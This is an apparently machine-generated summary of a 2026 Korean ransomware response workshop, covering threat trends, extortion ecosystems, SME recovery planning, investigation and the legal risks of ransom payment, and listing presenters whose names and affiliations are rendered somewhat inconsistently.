Summary of "2026 제4회 랜섬웨어대응연구회 워크숍"
Summary of the Workshop Content (2026 제4회 랜섬웨어대응연구회 워크숍)
1) Workshop Purpose and Framing
- The opening and early remarks define ransomware as an evolving societal threat, not merely a financial or IT incident.
- A core emphasis is that effective response requires:
- Practical response capabilities
- Continuous information sharing across government–academia–industry
- Preparation for both investigation and recovery
2) Ransomware Threat Trends, Group Behavior, and “What to Watch”
A first session focused on ransomware group trends and damage cases, highlighting:
- The threat landscape changes rapidly, including frequent emergence of AI-assisted or rapidly mutating tactics.
- Ransomware crews are increasingly operating through data theft and extortion ecosystems, not only encrypting files “for money.”
A notable discussion covered the ransomware group Gilin/Guilin (sometimes referenced as “Killin”):
- The group’s framing: targeting victim data, threatening disclosure, and leveraging ransomware within a broader profit model.
- Defender guidance: track where the group moves, how it operates, and which targets come next—not just the ransomware name/label.
3) Cybercrime Statistics: “Damage May Appear to Drop, but Ransomware Incidence Keeps Rising”
A major analytical point challenged the idea that ransomware is truly decreasing:
- Some reporting views may show downward trends in reported damages (e.g., in certain reporting contexts such as the U.S.).
- However, the number of incidents/cases—especially globally—has not clearly declined and may continue to rise.
- The discussion critiques simplistic interpretations that equate “less damage in one metric” with “less ransomware overall,” emphasizing reporting limits and differences in what is counted.
4) How Ransomware Profit is Structured: From Encryption to “Service + Ecosystem”
The talks stress that modern ransomware often works like a service ecosystem, involving:
- Initial access actors
- Affiliate/distribution groups
- Data exfiltration stages
- Extortion/negotiation components
- “Repackaging” into ransomware
The underlying objective is framed as data extraction and monetization, where encryption functions mainly as a coercion mechanism rather than the sole profit engine.
5) Malware Delivery and Common Infection Patterns (Practical DFIR Concerns)
A practical section described a typical infection chain:
- Initial entry via phishing/social engineering or exploited vulnerabilities
- Malware execution leading to data theft
- Eventual ransomware deployment
The session also warned about:
- Malicious files disguised as legitimate documents/shortcuts/links
- (Including long-running distribution techniques such as LNK-shortcut-based delivery)
- The key operational takeaway: file extensions and surface appearance are unreliable, so defenders should treat them as low-trust indicators.
6) “Response on the Right Track”: Legal Systems, Recovery Tooling, and Defense-to-Recovery Shift
A presenter argued that major countries are building ransomware-related legal/reporting frameworks, including:
- Reporting time windows and penalties (examples cited: U.S., Australia, EU, Japan, Singapore, and Korea with personal information reporting requirements)
While global law enforcement initiatives have disrupted some operations and supported recovery tooling:
- SMEs remain highly vulnerable due to limited security staffing, slower detection, and fewer resources.
Strategic proposal:
- Shift from a defense-only mindset to recovery-centered design, including:
- Immutable/air-gapped backups
- Integrity verification
- Segmentation
- MFA/passkeys
- Incident response (IR) playbooks
7) SME Vulnerability: Detection Delay, Backup Reinfection Risk, and Operational Reality
The SME-focused section argued:
- Large firms can detect/respond quickly (days), while SMEs may take months.
- Reinfection risk persists even after recovery because:
- Backups may be compromised or infected during the attacker’s dwell time and staging.
A phased mitigation approach was presented as maturity over time:
- Year 1: foundational measures + immutable backups + response manual
- Year 2: automation/segmentation + passkey/MFA strengthening + IR zone design
- Year 3: Zero Trust + governance + storage security maturity
Reported expected outcomes included:
- Improved detection rates
- Faster restoration (e.g., from ~weeks to ~days within the plan)
- Reduced reinfection probability
8) Case Study & Investigation Perspective (DFIR and Law Enforcement)
A DFIR/case presenter explained ransomware operational logic:
- Unlike stealth malware, ransomware is often engineered for extortion:
- Encryption and rapid disruption
- Data theft and blackmail workflow
A law enforcement/inspector presenter described an investigation case approach:
- Emphasis on:
- Timely reporting (to preserve investigative value)
- Evidence trails
- International cooperation
- Tracking financial flows (e.g., via virtual assets)
- The speaker noted arrests are often not possible due to insufficient data/reporting and delays, and that stronger cooperation improves odds of takedowns and recovery.
9) Legal Issues: Negotiation, Payments, Sanctions, and Corporate Decision Risk
A legal session addressed the question: “Can we negotiate?” and what payment implies legally.
- Negotiation was described as not necessarily automatically prohibited domestically.
- However, payments can introduce multiple legal risks.
Key legal risk categories emphasized:
- Breach of trust / duty of care issues for management if payment is deemed improper
- Accounting/tax treatment complexities of ransom payments and vendor contracting
- Disclosure/reporting obligations when personal information or sensitive data leaks occur
- Anti-terrorism financing / sanctions compliance risks in state-linked cases
- (Discussion referenced groups such as Lazarus and related international sanctions exposure)
Advice:
- Treat payment decisions as complex legal/strategic actions requiring expert consultation and internal documentation.
10) Q&A Themes Across Sessions
Recurring concerns included:
- Why some countries (e.g., the U.S.) may not publicly contribute as much as expected despite strong recovery tools
- Technical guidance for investigating intrusion paths when logs are encrypted or evidence is erased
- How to estimate recovery/tool timelines and how AI alters attacker/defender dynamics
- Whether AI benefits defenders operationally or mainly accelerates attacker mutation
Presenters / Contributors (Named)
- Kim Ki-beom (National Security Technology Research Institute; ransomware response research introduction)
- Park Tae-hwan (Guide Bae / ransomware group trends presenter)
- Lee Dong-hyun (Director; session chair / Intelligence Agency National Damage Response Team)
- Lee Jun-young (Playbit Digital Threat Response Center; DFIR/ransomware incident case)
- Kim Ki-hoon (Jiheungwon / Korea Internet & Security Agency team lead; “Are we on the right track?” recovery/legal/strategy)
- Lee Sang-joong (Korea Internet & Security Agency Director; remarks/congratulatory speech in opening)
- Song Joong-seok (Korea Science and Technology / Information Research Institute Director; opening remarks)
- Jung-seong Kim (Kookmin University; chair of the ransomware response research committee; opening address)
- Lee Jung-hyun (Korea Information Society Senior Vice President; welcoming address)
- Kim Hyun-jang (lawyer; legal session co-presenter)
- Park Jong-guk (attorney/lawyer; legal session co-presenter)
- Lee Ji-won / Lee Ji-yong (National Police Agency inspector; ransomware investigation case study)
- Yoo Seung-hwan (Sangmyung University; Q&A contributor)
- Kim Gwang-jo (Professor emeritus; Q&A contributor)
Category
News and Commentary
Share this summary
Is the summary off?
If you think the summary is inaccurate, you can reprocess it with the latest model.
Preparing reprocess...